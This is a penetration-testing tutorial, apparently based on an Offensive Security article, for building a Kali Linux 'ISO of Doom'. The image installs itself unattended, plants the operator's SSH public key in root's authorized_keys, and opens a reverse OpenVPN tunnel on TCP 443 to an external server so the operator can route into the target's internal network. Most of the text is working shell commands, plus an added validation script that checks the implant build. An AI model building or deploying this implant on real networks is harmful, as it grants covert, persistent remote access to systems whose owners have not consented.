doom

Kali 2.0 Linux ISO of Doom

Setting up the OpenVPN Server

We will first set up our OpenVPN server on a Kali Linux box with an external IP address (a.b.c.d). Once that's done, we'll build the Kali Linux ISO of Doom on the same machine and make it available for download through HTTP.

echo "1" > /proc/sys/net/ipv4/ip_forward
# Turn the server into the client's gateway
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
# Generate the OpenVPN server and client certs.
mkdir /etc/openvpn/easy-rsa
cp /usr/share/easy-rsa/** /etc/openvpn/easy-rsa
cd /etc/openvpn/easy-rsa/
sed -i 's/ --interact//' build-ca
sed -i 's/ --interact//' build-key-server
. ./vars
./clean-all
./build-ca
./build-key-server server
./build-key client
./build-dh
cp -rf keys/{server.crt,server.key,dh2048.pem,ca.crt} /etc/openvpn/
# Generate the OpenVPN server configuration file.
cd /etc/openvpn
echo tls-server > server.conf
echo port 443 >> server.conf
echo proto tcp >> server.conf
echo dev tap >> server.conf
echo ca ca.crt >> server.conf
echo cert server.crt >> server.conf
echo key server.key >> server.conf
echo dh dh2048.pem >> server.conf
echo server 10.8.0.0 255.255.255.0 >> server.conf
echo push "redirect-gateway def1 bypass-dhcp" >> server.conf
echo client-config-dir static >> server.conf
echo keepalive 10 120 >> server.conf
echo comp-lzo >> server.conf
echo user nobody >> server.conf
echo group nogroup >> server.conf
echo persist-key >> server.conf
echo persist-tun >> server.conf
echo status openvpn-status.log >> server.conf
echo verb 3 >> server.conf
# Now we create the client keys. We can have more than one.
mkdir -p static
echo ifconfig-push 10.8.0.200 255.255.255.0 > static/client
cd ~
# start the OpenVPN server
/etc/init.d/openvpn start
# Generate SSH keys to later access the client.
ssh-keygen

Building the Kali Reverse VPN Agent ISO

Now comes the ISO generation. This is where we will build a custom Kali Linux ISO image with the specific set of tools we need for the engagement. The amazing part about this is how simple it is to accomplish compared to any other penetration testing distribution.

apt-get update
apt-get install git live-build cdebootstrap curl -y
git clone git://git.kali.org/live-build-config.git build
cd build
echo 'update-rc.d -f ssh enable' >> kali-config/common/hooks/01-start-ssh.chroot
chmod +x kali-config/common/hooks/01-start-ssh.chroot
echo 'update-rc.d -f openvpn enable' >> kali-config/common/hooks/02-start-openvpn.chroot
chmod +x kali-config/common/hooks/02-start-openvpn.chroot
wget https://www.kali.org/dojo/unattended.txt -O kali-config/common/hooks/02-unattended-boot.binary
chmod +x kali-config/common/hooks/02-unattended-boot.binary
ssh-keygen
mkdir -p kali-config/common/includes.chroot/root/.ssh/
cp /root/.ssh/id_rsa.pub kali-config/common/includes.chroot/root/.ssh/authorized_keys
wget https://www.kali.org/dojo/preseed.cfg -O ./kali-config/common/includes.installer/preseed.cfg
echo openvpn >> kali-config/common/package-lists/kali.list.chroot
echo openssh-server >> kali-config/common/package-lists/kali.list.chroot
echo open-vm-tools >> kali-config/common/package-lists/kali.list.chroot
mkdir kali-config/common/includes.chroot/etc
mkdir kali-config/common/includes.chroot/etc/openvpn
cp /etc/openvpn/easy-rsa/keys/{ca.crt,client.crt,client.key} kali-config/common/includes.chroot/etc/openvpn/
cat << EOF > kali-config/common/includes.chroot/etc/openvpn/client.conf
client
dev tap
proto tcp
remote your_server_ip 443 # remote server IP
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
ns-cert-type server
comp-lzo
verb 3
EOF

apt-get remove --purge libdebian-installer4 -y
wget http://ftp.debian.org/debian/pool/main/libd/libdebian-installer/libdebian-installer_0.99.tar.xz
tar xvf libdebian-installer_0.99.tar.xz
cd libdebian-installer-0.99
grep -R parser_rfc822 src
apt-get install automake libtool
autoreconf -i -v
./configure
make
make install
cd ~

lb config
lb build
mv binary.hybrid.iso /var/www/
service apache2 start
cd /etc/openvpn/
openvpn --config /etc/openvpn/server.conf

Now, when you boot a system from the ISO, it starts an unattended install and connects back over the VPN after the reboot.
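A pre-flight check for the live-build tree assembled above, added here as an example (it is not part of the original article or of the Kali project). It assumes the kali-config/common layout used in the commands above; the sample tree it creates is constructed for demonstration only.

```shell
# check_iso_tree <build-dir>: sanity-check kali-config/common before `lb build`.
# Returns 0 when every check passes, 1 otherwise, printing each failure.
check_iso_tree() {
    cfg="$1/kali-config/common"
    rc=0
    fail() { echo "FAIL: $1"; rc=1; }

    # live-build silently ignores hooks that are not executable.
    for h in "$cfg"/hooks/*.chroot "$cfg"/hooks/*.binary; do
        [ -e "$h" ] || continue
        [ -x "$h" ] || fail "hook not executable: $h"
    done

    # The agent must have openvpn and sshd baked into the image.
    for p in openvpn openssh-server; do
        grep -qx "$p" "$cfg"/package-lists/*.chroot 2>/dev/null || fail "package not listed: $p"
    done

    # client.conf must point at the real server, not a placeholder.
    conf="$cfg/includes.chroot/etc/openvpn/client.conf"
    if [ -r "$conf" ]; then
        remote=$(awk '$1 == "remote" { print $2; exit }' "$conf")
        case "$remote" in
            ""|your_server_ip|a.b.c.d) fail "client.conf remote is unset or a placeholder: '$remote'" ;;
        esac
        # Typographic quotes pasted from a web page are not valid in the config.
        if grep -q -e '“' -e '”' "$conf"; then fail "client.conf contains typographic quotes"; fi
    else
        fail "missing $conf"
    fi

    # The CA cert, client cert/key and the SSH authorized key must all be present.
    for f in etc/openvpn/ca.crt etc/openvpn/client.crt etc/openvpn/client.key root/.ssh/authorized_keys; do
        [ -s "$cfg/includes.chroot/$f" ] || fail "missing or empty: $f"
    done
    return "$rc"
}

# make_sample_tree <remote>: constructed sample tree (not a real build) for testing the check.
make_sample_tree() {
    d=$(mktemp -d); c="$d/kali-config/common"
    mkdir -p "$c/hooks" "$c/package-lists" "$c/includes.chroot/etc/openvpn" "$c/includes.chroot/root/.ssh"
    echo 'update-rc.d -f ssh enable' > "$c/hooks/01-start-ssh.chroot"; chmod +x "$c/hooks/01-start-ssh.chroot"
    printf 'openvpn\nopenssh-server\n' > "$c/package-lists/kali.list.chroot"
    printf 'client\ndev tap\nremote %s 443\n' "$1" > "$c/includes.chroot/etc/openvpn/client.conf"
    for f in ca.crt client.crt client.key; do echo 'constructed-placeholder' > "$c/includes.chroot/etc/openvpn/$f"; done
    echo 'ssh-rsa AAAAconstructed root@example' > "$c/includes.chroot/root/.ssh/authorized_keys"
    echo "$d"
}

# Stand-alone demo: 203.0.113.10 is a constructed TEST-NET address; the placeholder tree must be rejected.
check_iso_tree "$(make_sample_tree 203.0.113.10)" && echo "tree OK"
check_iso_tree "$(make_sample_tree your_server_ip)" || echo "placeholder tree rejected as expected"
```

Run it against the build directory (`check_iso_tree ~/build`) right before `lb build`; every FAIL line names the file to fix.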

Bridging the Network Gaps

Once the VPN connection is established by the client, we can SSH to our internal Kali Linux agent and complete the final requirement: to bridge the remote and local networks together.

On the server

We enable routing to the remote network on the OpenVPN server:

route add -net 192.168.101.0/24 gw 10.8.0.200

On the Kali Agent

We proceed and turn on IP forwarding along with IP masquerade on the remote Kali agent:

echo 1 >/proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE

With this complete, our remote target network is now fully accessible to us. We can use any tools we have to interact with the remote network just as if it were connected as a WAN. All fully automated and easy to set up. These sorts of customizations to Kali are where the real power lives.

based on https://www.offensive-security.com/kali-linux/kali-linux-iso-of-doom/
